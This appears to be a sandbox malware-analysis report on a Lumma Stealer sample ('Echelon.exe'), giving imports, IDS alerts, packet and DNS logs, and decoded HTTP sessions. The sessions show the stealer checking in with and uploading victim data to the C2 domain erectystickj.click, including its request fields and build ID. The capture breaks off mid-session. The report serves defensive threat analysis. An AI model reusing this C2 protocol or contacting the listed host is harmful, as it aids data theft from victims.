ole32.dll | CoFreeUnusedLibraries, OleUninitialize, OleLockRunning, OleGetClipboard, RevokeDragDrop, CoLockObjectExternal, RegisterDragDrop, DoDragDrop, OleFlushClipboard, OleIsCurrentClipboard, OleInitialize, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CoInitializeEx, CLSIDFromString, CLSIDFromProgID, CoCreateGuid, OleDuplicateData, OleCreateMenuDescriptor, OleDestroyMenuDescriptor, OleTranslateAccelerator, IsAccelerator, CoRegisterMessageFilter, CoRevokeClassObject, CoTaskMemAlloc, ReleaseStgMedium, CoTaskMemFree, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal
OLEAUT32.dll | VariantClear, VariantChangeType, VariantInit, SysAllocString, VariantCopy, SysAllocStringLen, SafeArrayDestroy, VariantTimeToSystemTime, SystemTimeToVariantTime, SysStringLen, VarBstrFromDate, OleCreateFontIndirect, SysFreeString
oledlg.dll | OleUIBusyW
gdiplus.dll | GdipSetInterpolationMode, GdipCreateFromHDC, GdipCreateBitmapFromHBITMAP, GdipCloneImage, GdipDrawImageI, GdipGetImageGraphicsContext, GdiplusShutdown, GdiplusStartup, GdipBitmapUnlockBits, GdipBitmapLockBits, GdipCreateBitmapFromScan0, GdipCreateBitmapFromStream, GdipGetImagePalette, GdipGetImagePaletteSize, GdipGetImagePixelFormat, GdipGetImageHeight, GdipGetImageWidth, GdipDisposeImage, GdipDeleteGraphics, GdipAlloc, GdipFree, GdipDrawImageRectI
OLEACC.dll | AccessibleObjectFromWindow, CreateStdAccessibleObject, LresultFromObject
IMM32.dll | ImmReleaseContext, ImmGetContext, ImmGetOpenStatus
WINMM.dll | PlaySoundW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T02:29:11.940959+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49707 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:12.685320+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49707 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:12.685320+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49707 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:13.994762+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49708 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:14.749911+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49708 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:14.749911+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49708 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:16.322446+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49709 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:18.572983+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49712 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:21.593774+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49716 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:24.823919+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49723 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:25.618042+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49723 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:27.744190+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49733 | 172.67.154.166 | 443 | TCP
2024-12-23T02:29:30.348810+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49740 | 172.67.154.166 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                      Dec 23, 2024 02:29:15.108036041 CET44349709172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:16.322367907 CET44349709172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:16.322446108 CET49709443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:16.323474884 CET49709443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:16.323477983 CET44349709172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:16.323795080 CET44349709172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:16.324877024 CET49709443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:16.325133085 CET49709443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:16.325169086 CET44349709172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:17.230998039 CET44349709172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:17.231112957 CET44349709172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:17.231216908 CET49709443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:17.231345892 CET49709443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:17.231359959 CET44349709172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:17.348571062 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:17.348687887 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:17.348798990 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:17.349147081 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:17.349180937 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:18.572864056 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:18.572983027 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:18.582895041 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:18.582931042 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:18.583307981 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:18.584613085 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:18.584786892 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:18.584829092 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:18.584974051 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:18.631334066 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:19.504622936 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:19.504741907 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:19.504837990 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:19.505059958 CET49712443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:19.505105019 CET44349712172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:20.379301071 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:20.379334927 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:20.379401922 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:20.379875898 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:20.379892111 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:21.593700886 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:21.593774080 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:21.595704079 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:21.595712900 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:21.595915079 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:21.604265928 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:21.604588985 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:21.604623079 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:21.604886055 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:21.604895115 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:22.566807985 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:22.566890001 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:22.567200899 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:22.567416906 CET49716443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:22.567428112 CET44349716172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:23.537072897 CET49723443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:23.537116051 CET44349723172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:23.537172079 CET49723443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:23.537570000 CET49723443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:23.537584066 CET44349723172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:24.823754072 CET44349723172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:24.823919058 CET49723443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:24.825263023 CET49723443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:24.825273991 CET44349723172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:24.825483084 CET44349723172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:24.832972050 CET49723443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:24.833085060 CET49723443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:24.833098888 CET44349723172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:25.618038893 CET44349723172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:25.618129969 CET44349723172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:25.618194103 CET49723443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:25.621406078 CET49723443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:25.621431112 CET44349723172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:26.529555082 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:26.529599905 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:26.529695034 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:26.529978037 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:26.529992104 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.744015932 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.744189978 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.745516062 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.745531082 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.745748043 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.747273922 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.747977018 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.748018980 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.748898029 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.748935938 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.749861956 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.749908924 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.750047922 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.750085115 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.750253916 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.750289917 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.750557899 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.750588894 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.750600100 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.750613928 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.750747919 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.750771999 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.750798941 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.750920057 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.750962973 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.791348934 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.791547060 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.791596889 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.791623116 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.791644096 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.791667938 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.791681051 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:27.791815996 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:27.791827917 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:30.196225882 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:30.196317911 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:30.196391106 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:30.196628094 CET49733443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:30.196646929 CET44349733172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:30.227063894 CET49740443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:30.227137089 CET44349740172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:30.227248907 CET49740443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:30.227603912 CET49740443192.168.2.5172.67.154.166
                                                                                      Dec 23, 2024 02:29:30.227634907 CET44349740172.67.154.166192.168.2.5
                                                                                      Dec 23, 2024 02:29:30.348809958 CET49740443192.168.2.5172.67.154.166
                                                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                      Dec 23, 2024 02:29:10.379153013 CET | 57884 | 53 | 192.168.2.5 | 1.1.1.1
                                                                                      Dec 23, 2024 02:29:10.707391977 CET | 53 | 57884 | 1.1.1.1 | 192.168.2.5
                                                                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                      Dec 23, 2024 02:29:10.379153013 CET | 192.168.2.5 | 1.1.1.1 | 0xa955 | Standard query (0) | erectystickj.click | A (IP address) | IN (0x0001) | false
                                                                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                      Dec 23, 2024 02:29:10.707391977 CET | 1.1.1.1 | 192.168.2.5 | 0xa955 | No error (0) | erectystickj.click |  | 172.67.154.166 | A (IP address) | IN (0x0001) | false
                                                                                      Dec 23, 2024 02:29:10.707391977 CET | 1.1.1.1 | 192.168.2.5 | 0xa955 | No error (0) | erectystickj.click |  | 104.21.5.142 | A (IP address) | IN (0x0001) | false
                                                                                      • erectystickj.click
                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      0 | 192.168.2.5 | 49707 | 172.67.154.166 | 443 | 3356 | C:\Users\user\Desktop\Echelon.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-12-23 01:29:12 UTC | 265 | OUT | POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: erectystickj.click
                                                                                      2024-12-23 01:29:12 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                      Data Ascii: act=life
                                                                                      2024-12-23 01:29:12 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                      Date: Mon, 23 Dec 2024 01:29:12 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=83ib779k6tlken3ahkjoina7kb; expires=Thu, 17 Apr 2025 19:15:51 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iHpMnrzS6460W%2BNvUXvIcDlIjjCkbfNewyqgmgbtgkG89BmZZo0xEPbWmb%2Bkq600%2BMrwiXFJF%2BGQxrTBJUp8xhBezpAPDX5u%2FIIdeSgHa2JPsmPaCsrstRlTUL5E4zpTd%2BqXjZQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f64944b5acb42c3-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2068&min_rtt=1759&rtt_var=1279&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=689166&cwnd=203&unsent_bytes=0&cid=3d1e57887dd3716a&ts=764&x=0"
                                                                                      2024-12-23 01:29:12 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                      Data Ascii: 2ok
                                                                                      2024-12-23 01:29:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      1 | 192.168.2.5 | 49708 | 172.67.154.166 | 443 | 3356 | C:\Users\user\Desktop\Echelon.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-12-23 01:29:13 UTC | 266 | OUT | POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 52
                                                                                      Host: erectystickj.click
                                                                                      2024-12-23 01:29:13 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 31 38 31 36 39 30 36 37 38 35 26 6a 3d
                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--1816906785&j=
                                                                                      2024-12-23 01:29:14 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                      Date: Mon, 23 Dec 2024 01:29:14 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=4b42pu59nhbgs3703868cqobhm; expires=Thu, 17 Apr 2025 19:15:53 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FPJ2Z8%2FpgsAkLa6G0KSWngB5JIzNtgu6wMQopN6QyvU5V6UwrkTqxIG92cZN5l3qyGvMYYtDMRrxlIn8i3%2B2ZgbZA1Q%2FAL%2F1CbTLmY5rVwjFtMy0TlqUjymR5j5cnzAn5w4EqVc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f6494583bae430e-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1653&rtt_var=640&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=954&delivery_rate=1684939&cwnd=186&unsent_bytes=0&cid=745e0b4eb4b686d9&ts=763&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49709 | 172.67.154.166 | 443 | 3356 | C:\Users\user\Desktop\Echelon.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 01:29:16 UTC | 279 | OUT | POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=68TR9TI6M5OBM
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 12810
                                                                                      Host: erectystickj.click
2024-12-23 01:29:16 UTC | 12810 | OUT | Data Ascii:
--68TR9TI6M5OBM
Content-Disposition: form-data; name="hwid"

0A6BF6089C326C48040CF816C08B1DD4
--68TR9TI6M5OBM
Content-Disposition: form-data; name="pid"

2
--68TR9TI6M5OBM
Content-Disposition: form-data; name="lid"

yau6Na--1816906785
--68TR9T
2024-12-23 01:29:17 UTC | 1139 | IN | HTTP/1.1 200 OK
                                                                                      Date: Mon, 23 Dec 2024 01:29:17 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=pkqhtlvdk4se3clgsktp1sjrbb; expires=Thu, 17 Apr 2025 19:15:55 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2FspnR8oChNHLC9tEqp5JU6Uckz82NMjStd%2Fk9dWdb4vw2BLbGNHD6lllkPI4v1xjE%2FpQCa2ekasMfswwXlKjtRGjpMyrUKn3MmbFGCn%2FDAmEeWl5hne%2B2Z5%2BXjnf8O60upJKG8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f6494661e8e5e60-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1713&rtt_var=654&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13747&delivery_rate=1660034&cwnd=248&unsent_bytes=0&cid=ac157fb5f26a4d24&ts=916&x=0"
2024-12-23 01:29:17 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 01:29:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49712 | 172.67.154.166 | 443 | 3356 | C:\Users\user\Desktop\Echelon.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 01:29:18 UTC | 281 | OUT | POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=17ILINSQ6U41R2E
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 15064
                                                                                      Host: erectystickj.click
2024-12-23 01:29:18 UTC | 15064 | OUT | Data Ascii:
--17ILINSQ6U41R2E
Content-Disposition: form-data; name="hwid"

0A6BF6089C326C48040CF816C08B1DD4
--17ILINSQ6U41R2E
Content-Disposition: form-data; name="pid"

2
--17ILINSQ6U41R2E
Content-Disposition: form-data; name="lid"

yau6Na--1816906785
--
2024-12-23 01:29:19 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                      Date: Mon, 23 Dec 2024 01:29:19 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=527hqib1mermd3kvp80djaol9h; expires=Thu, 17 Apr 2025 19:15:58 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xYPvQQHgdb5xSdrc1l588wzZEOcXLDn5XygQVes77BQigH%2BC8WeKQt1S2ncEfTGNXMVdrPwpPL8kon2IOeCV6vB0K66c%2BKET9ZYQDeAVN8GTz18MrxM766KHauxKwz83iAPupJU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f6494742f7ade97-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1538&rtt_var=590&sent=11&recv=21&lost=0&retrans=0&sent_bytes=2847&recv_bytes=16003&delivery_rate=1835323&cwnd=231&unsent_bytes=0&cid=9f19cf8fabe441f4&ts=937&x=0"
2024-12-23 01:29:19 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 01:29:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49716 | 172.67.154.166 | 443 | 3356 | C:\Users\user\Desktop\Echelon.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 01:29:21 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=4OZW1KMF1ZD
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 20530
                                                                                      Host: erectystickj.click
2024-12-23 01:29:21 UTC | 15331 | OUT | Data Ascii:
--4OZW1KMF1ZD
Content-Disposition: form-data; name="hwid"

0A6BF6089C326C48040CF816C08B1DD4
--4OZW1KMF1ZD
Content-Disposition: form-data; name="pid"

3
--4OZW1KMF1ZD
Content-Disposition: form-data; name="lid"

yau6Na--1816906785
--4OZW1KMF1ZD
2024-12-23 01:29:22 UTC | 1134 | IN | HTTP/1.1 200 OK
                                                                                      Date: Mon, 23 Dec 2024 01:29:22 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=tnp6u12f274mufcjeqpnkrpkqq; expires=Thu, 17 Apr 2025 19:16:01 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
